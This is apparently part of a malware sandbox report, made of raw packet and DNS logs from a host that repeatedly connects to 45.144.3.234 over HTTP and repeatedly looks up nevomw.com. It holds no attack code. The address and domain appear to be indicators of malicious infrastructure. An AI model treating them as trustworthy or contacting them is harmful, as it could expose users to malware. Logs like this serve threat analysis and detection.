                                            Dec 2, 2020 11:54:22.520944118 CET804996745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.542134047 CET804996745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.542181969 CET804996745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.542330027 CET4996780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.542402983 CET4996780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.594935894 CET804996745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.759588003 CET4996880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.811675072 CET804996845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.811908007 CET4996880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.819144964 CET4996880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.871206045 CET804996845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.871330023 CET4996880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.923433065 CET804996845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.944391966 CET804996845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.944422960 CET804996845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.944516897 CET4996880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.944566965 CET4996880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.999387026 CET804996845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:23.130531073 CET4996980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:23.183933020 CET804996945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:23.184103966 CET4996980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:23.191459894 CET4996980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:23.244259119 CET804996945.144.3.234192.168.2.6

                                            UDP Packets

                                            Dec 2, 2020 11:52:45.611747026 CET53552998.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:46.081265926 CET6374553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:46.116872072 CET53637458.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:47.086719990 CET5005553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:47.122234106 CET53500558.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:47.525657892 CET6137453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:47.561136961 CET53613748.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:47.956501961 CET5033953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:47.991945982 CET53503398.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:48.383275032 CET6330753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:48.418570042 CET53633078.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:48.786987066 CET4969453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:48.822575092 CET53496948.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:49.203802109 CET5498253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:49.230813026 CET53549828.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:49.659370899 CET5001053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:49.694818020 CET53500108.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:50.093799114 CET6371853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:50.129313946 CET53637188.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:50.534687996 CET6211653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:50.570329905 CET53621168.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:50.974617958 CET6381653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:51.013034105 CET53638168.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:51.391402960 CET5501453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:51.431253910 CET53550148.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:51.891607046 CET6220853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:51.927218914 CET53622088.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:52.391201973 CET5757453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:52.426688910 CET53575748.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:52.787806034 CET5181853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:52.823009968 CET53518188.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:52.922101974 CET5662853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:52.949182034 CET53566288.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:53.241023064 CET6077853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:53.268198013 CET53607788.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:53.685561895 CET5379953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:53.721225977 CET53537998.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:54.084891081 CET5468353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:54.120260954 CET53546838.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:54.560220957 CET5932953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:54.600783110 CET53593298.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:55.011075020 CET6402153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:55.046402931 CET53640218.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:55.415225983 CET5612953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:55.442281961 CET53561298.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:55.873862982 CET5817753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:55.909446955 CET53581778.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:56.396317005 CET5070053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:56.431663990 CET53507008.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:56.770127058 CET5406953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:56.798049927 CET53540698.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:57.169342041 CET6117853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:57.196469069 CET53611788.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:57.657506943 CET5701753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:57.684812069 CET53570178.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:58.035134077 CET5632753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:58.062277079 CET53563278.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:58.479775906 CET5024353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:58.515727043 CET53502438.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:58.879780054 CET6205553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:58.907005072 CET53620558.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:59.275832891 CET6124953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:59.302881002 CET53612498.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:59.678181887 CET6525253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:59.713706970 CET53652528.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:00.166532040 CET6436753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:00.193737030 CET53643678.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:00.558366060 CET5506653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:00.585374117 CET53550668.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:00.962841988 CET6021153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:00.989985943 CET53602118.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:01.440953970 CET5657053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:01.478122950 CET53565708.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:01.910465002 CET5845453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:01.946038008 CET53584548.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:02.286391020 CET5518053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:02.313791037 CET53551808.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:02.878704071 CET5872153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:02.905879974 CET53587218.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:03.308295965 CET5769153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:03.335556984 CET53576918.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:04.113468885 CET5294353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:04.140631914 CET53529438.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:05.247956038 CET5948953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:05.283634901 CET53594898.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:05.641532898 CET6402253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:05.682204008 CET53640228.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:06.013871908 CET6002353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:06.049491882 CET53600238.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:06.460585117 CET5719353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:06.496139050 CET53571938.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:06.890744925 CET5024853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:06.926450968 CET53502488.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:07.282875061 CET6441353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:07.309964895 CET53644138.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:07.757424116 CET6042953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:07.784583092 CET53604298.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:08.224451065 CET6034553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:09.288620949 CET6034553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:10.121442080 CET53603458.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:10.472949982 CET5873053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:10.508510113 CET53587308.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:10.939058065 CET5383053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:10.966033936 CET53538308.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:11.357434034 CET5722653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:11.392880917 CET53572268.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:11.856349945 CET5788053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:11.883450985 CET53578808.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:11.992330074 CET6085053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:12.032121897 CET53608508.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:12.288547993 CET5318753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:12.324453115 CET53531878.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:12.675846100 CET5583053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:12.711486101 CET53558308.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:12.740447044 CET5514553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:12.767549038 CET53551458.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:13.154231071 CET6409153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:13.194992065 CET53640918.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:13.244995117 CET5572853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:13.280430079 CET53557288.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:13.602885008 CET5569453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:13.630021095 CET53556948.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:13.651527882 CET5392653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:13.664628983 CET6553153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:13.682809114 CET6543753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:13.703391075 CET53539268.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:13.705343008 CET53655318.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:13.718343019 CET53654378.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:14.028386116 CET5459053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:14.055421114 CET53545908.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:14.091432095 CET5131853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:14.127091885 CET53513188.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:14.418385029 CET6088853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:14.445549011 CET53608888.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:14.534579992 CET5847453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:14.570110083 CET53584748.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:14.831980944 CET6457553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:14.859060049 CET53645758.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:15.003618956 CET5909253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:15.039313078 CET53590928.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:15.284384966 CET5748353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:15.320094109 CET53574838.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:15.406582117 CET5383053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:15.446218014 CET53538308.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:15.667623997 CET4980953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:15.678807020 CET5281453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:15.703068018 CET53498098.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:15.714591026 CET53528148.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:16.030819893 CET5106953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:16.066318989 CET53510698.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:16.391937971 CET5652653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:16.411999941 CET5051253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:16.427628994 CET53565268.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:16.439069986 CET53505128.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:16.780730963 CET5167953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:16.807925940 CET53516798.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:16.841665030 CET5607153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:16.876996994 CET53560718.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:17.151694059 CET5895053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:17.187235117 CET53589508.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:17.223705053 CET5703553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:17.250780106 CET53570358.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:17.514981985 CET5412253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:17.555629969 CET53541228.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:17.903167009 CET5675953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:17.956578970 CET5922053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:17.992027998 CET53592208.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:18.336477995 CET6221153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:18.363548040 CET53622118.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:18.710259914 CET6203353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:18.737206936 CET53620338.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:18.912590981 CET5675953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:18.939637899 CET53567598.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:19.234713078 CET6124453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:19.261743069 CET53612448.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:19.627461910 CET5369653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:19.654512882 CET53536968.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:19.864814997 CET5073353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:19.915107965 CET53507338.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:20.131280899 CET5577053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:20.166687965 CET53557708.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:20.213207006 CET5452553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:20.241362095 CET53545258.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:20.728956938 CET6176053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:20.756004095 CET53617608.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:21.179210901 CET6382253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:21.206274986 CET53638228.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:21.260250092 CET5095753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:21.295634985 CET53509578.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:21.933065891 CET5966653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:21.968331099 CET53596668.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:23.109603882 CET5222353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:23.136975050 CET53522238.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:23.221131086 CET6013653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:23.248174906 CET53601368.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:23.515954018 CET5564953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:23.543100119 CET53556498.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:23.884077072 CET5152453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:23.911144018 CET53515248.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:24.321515083 CET5914153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:24.348766088 CET53591418.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:24.618297100 CET4968253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:24.645474911 CET53496828.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:24.746162891 CET4970953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:24.775336981 CET53497098.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:25.162528038 CET5938453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:25.189646006 CET53593848.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:25.535120010 CET5028453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:25.570763111 CET53502848.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:25.711575985 CET5308953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:25.738579035 CET53530898.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:25.947319984 CET5056353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:25.974462032 CET53505638.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:26.361608982 CET5026553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:26.388704062 CET53502658.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:26.781534910 CET5544253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:26.822185993 CET53554428.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:26.857091904 CET4956153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:26.883987904 CET53495618.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:27.201503992 CET5409753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:27.228805065 CET53540978.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:27.631100893 CET5950253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:27.658185959 CET53595028.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:27.660590887 CET5795953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:27.687689066 CET53579598.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:28.056104898 CET5497153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:28.083373070 CET53549718.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:28.371154070 CET5096953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:28.398387909 CET53509698.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:28.488528967 CET5218353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:28.515634060 CET53521838.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:28.910182953 CET6335453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:28.937254906 CET53633548.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:29.182518005 CET5063553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:29.209546089 CET53506358.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:29.335936069 CET6160353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:29.363059998 CET53616038.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:29.746006012 CET5831853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:29.773325920 CET53583188.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:29.995102882 CET6082653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:30.038914919 CET53608268.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:30.157058954 CET5776353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:30.184181929 CET53577638.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:30.534432888 CET5011153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:30.561573029 CET53501118.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:30.950144053 CET5720653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:30.977451086 CET53572068.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:31.414361000 CET5713253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:31.441651106 CET53571328.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:31.786268950 CET5548353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:31.813337088 CET53554838.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:32.222188950 CET6162653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:32.249223948 CET53616268.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:32.588006020 CET5967553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:32.615169048 CET53596758.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:33.002825975 CET6014953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:33.029988050 CET53601498.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:33.441160917 CET6214153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:33.468313932 CET53621418.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:33.586114883 CET4934553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:33.613213062 CET53493458.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:33.848555088 CET6407453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:33.875742912 CET53640748.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:34.279545069 CET5582953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:34.306705952 CET53558298.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:34.717075109 CET6226053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:34.744317055 CET53622608.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:35.146568060 CET6421153192.168.2.68.8.8.8

                                            DNS Queries

                                            Dec 2, 2020 11:53:05.641532898 CET192.168.2.68.8.8.80x6d9fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:06.013871908 CET192.168.2.68.8.8.80xa6d0Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:06.460585117 CET192.168.2.68.8.8.80x8c0cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:06.890744925 CET192.168.2.68.8.8.80xb320Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:07.282875061 CET192.168.2.68.8.8.80xe178Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:07.757424116 CET192.168.2.68.8.8.80x82e7Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:08.224451065 CET192.168.2.68.8.8.80xf1edStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:09.288620949 CET192.168.2.68.8.8.80xf1edStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:10.472949982 CET192.168.2.68.8.8.80x886eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:10.939058065 CET192.168.2.68.8.8.80x2363Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:11.357434034 CET192.168.2.68.8.8.80xa1bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:11.856349945 CET192.168.2.68.8.8.80xf955Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:12.288547993 CET192.168.2.68.8.8.80x2df6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:12.675846100 CET192.168.2.68.8.8.80x73eeStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:13.154231071 CET192.168.2.68.8.8.80x9cdcStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:13.602885008 CET192.168.2.68.8.8.80x2134Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:14.028386116 CET192.168.2.68.8.8.80x49d1Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:14.418385029 CET192.168.2.68.8.8.80x2017Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:14.831980944 CET192.168.2.68.8.8.80x3baaStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:15.284384966 CET192.168.2.68.8.8.80xe4e5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:15.667623997 CET192.168.2.68.8.8.80x31d0Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:16.030819893 CET192.168.2.68.8.8.80x7094Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:16.411999941 CET192.168.2.68.8.8.80xfbc6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:16.780730963 CET192.168.2.68.8.8.80x7453Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:17.151694059 CET192.168.2.68.8.8.80x4184Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:17.514981985 CET192.168.2.68.8.8.80xe1eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:17.956578970 CET192.168.2.68.8.8.80x986bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:18.336477995 CET192.168.2.68.8.8.80x6920Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:18.710259914 CET192.168.2.68.8.8.80x4b5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:19.234713078 CET192.168.2.68.8.8.80xfce1Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:19.627461910 CET192.168.2.68.8.8.80x2f7Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:19.864814997 CET192.168.2.68.8.8.80x5b32Standard query (0)g.msn.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:20.131280899 CET192.168.2.68.8.8.80x769fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:20.728956938 CET192.168.2.68.8.8.80xa7f3Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:21.179210901 CET192.168.2.68.8.8.80x8802Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:21.933065891 CET192.168.2.68.8.8.80x1cc5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:23.109603882 CET192.168.2.68.8.8.80x44beStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:23.515954018 CET192.168.2.68.8.8.80xac3Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:23.884077072 CET192.168.2.68.8.8.80xc754Standard query (0)nevomw.comA (IP address)IN (0x0001)
